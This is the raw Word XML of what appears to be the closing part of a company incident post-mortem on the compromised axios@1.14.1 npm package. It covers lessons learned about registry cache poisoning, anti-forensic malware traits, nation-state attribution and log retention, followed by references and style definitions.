          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The attack window was narrow, but the blast radius was wide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The compromised </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>axios@1.14.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> was live on public </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> for under 3 hours, yet a single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install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> during that window was sufficient to poison our registry cache for 8 days, contaminating GA builds distributed to clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB74" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Anti-forensics made passive detection impossible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> The malware's byte-for-byte identical source, self-deletion, manifest replacement, version spoofing, silent error handling, and process orphaning mean that standard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list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Mono" w:hAnsi="Liberation Mono"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">output and post-install log inspection are insufficient for reliable detection. Its byte-for-byte identical source bypassed all at-rest security scanners including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Active scanning, filesystem IOC checks, network egress monitoring, etc. are all necessary even on our build servers. Having such mechanisms in place on the build server would have caught the malicious install during the build process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB75" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nation-state actors target the open-source supply chain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> This attack was attributed to Sapphire Sleet, a North Korean state-sponsored group. Supply chain attacks are no longer theoretical risks nor infrequent; they are active, sophisticated, and can affect any organization that consumes open-source packages. The are also occurring with an alarmingly increasing frequency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB76" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
        </w:tabs>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nexus log rotation, lack of archival retention hindered forensic investigation and prevented root cause attribution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">The inability to determine which specific </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggered the cache poisoning, due to Nexus not archiving logs after rotation, hindered the forensic timeline and root cause investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB77" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="6" w:color="ECF0F1"/>
        </w:pBdr>
        <w:spacing w:before="450" w:after="225"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>10. References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CFB78" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Threat Intelligence &amp; Microsoft Defender Security Research Team. "Mitigating the Axios </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> supply chain compromise." </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Microsoft Security Blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, April 1, 2026.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
            <w:color w:val="1A1A1A"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:rPr>
          <w:t>https://www.microsoft.com/en-us/security/blog/2026/04/01/mitigating-the-axios-npm-supply-chain-compromise/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="278CFB79" w14:textId="77777777" w:rsidR="009764A3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StepSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. "Axios Compromised on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Malicious Versions Drop Remote Access Trojan." </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StepSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Blog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, March 31, 2026.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId6">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
            <w:color w:val="1A1A1A"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F0F0"/>
          </w:rPr>
          <w:t>https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidR="009764A3">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6FF" w:usb1="4000FCFF" w:usb2="00000009" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Mono">
    <w:altName w:val="Courier New"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="OpenSymbol">
    <w:altName w:val="Arial Unicode MS"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:altName w:val="Arial"/>
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="01"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Noto Sans CJK SC">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Lohit Devanagari">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Arial;sans-serif">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onsolas;Courier New;monospace">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0172"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26D0582E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>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0A9F247A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="50146C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4AC3741"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DA48AD24"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="176E15DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="ECF28FD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BDE3E9D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A29A61B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B8D73E6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBF0DCF6"/>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359D0125"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3782E4E2"/>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4EB42425"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B7803CB6"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>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56C03C1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E54C38E"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="1418" w:firstLine="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62E95AFB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0F42D898"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="0"/>
        </w:tabs>
        <w:ind w:left="709" w:firstLine="0"/>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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="665D460E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="997232FC"/>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15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7B2C0F17"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B3AC0D4"/>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734617604">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="162554598">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="989870689">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2066685640">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1468354376">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="274336257">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1239025509">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1391230196">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1350139325">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1396315391">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1887447550">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="687487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A3"/>
    <w:rsid w:val="000C2D21"/>
    <w:rsid w:val="009764A3"/>
    <w:rsid w:val="00C449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78CF9F7"/>
  <w15:docId w15:val="{BD7F5B39-8E01-5041-9C2C-9EDAE4EC2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Autospacing="1" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1"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ode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>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sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Consolas" w:cs="Consola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rPr>
      <w:color w:val="000080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="SourceText">
    <w:name w:val="Source Text"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Liberation Mono" w:eastAsia="Liberation Mono" w:hAnsi="Liberation Mono" w:cs="Liberation Mono"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="StrongEmphasis">
    <w:name w:val="Strong Emphasis"/>
    <w:qFormat/>
    <w:rPr>
      <w:b/>
      <w:bCs/>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styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:rPr>
      <w:color w:val="80000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pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>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unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="inf-root">
    <w:name w:val="inf-root"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:color w:val="333333"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="metadata">
    <w:name w:val="metadata"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="executive-summary">
    <w:name w:val="executive-summary"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="technical-section">
    <w:name w:val="technical-section"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="customer-impact">
    <w:name w:val="customer-impact"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="preventive">
    <w:name w:val="preventive"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="timeline-item">
    <w:name w:val="timeline-item"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="metadata1">
    <w:name w:val="metadata1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="ECF0F1"/>
      <w:spacing w:beforeAutospacing="1" w:after="450"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="executive-summary1">
    <w:name w:val="executive-summary1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="15" w:color="FFC107"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFF3CD"/>
      <w:spacing w:before="300" w:after="300"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="technical-section1">
    <w:name w:val="technical-section1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:pBdr>
        <w:left w:val="single" w:sz="24" w:space="15" w:color="3498DB"/>
      </w:pBdr>
      <w:shd w:val="clear" w:color="auto" w:fill="E8F4F8"/>
      <w:spacing w:before="300" w:after="300"/>
    </w:pPr>
  </w:style>
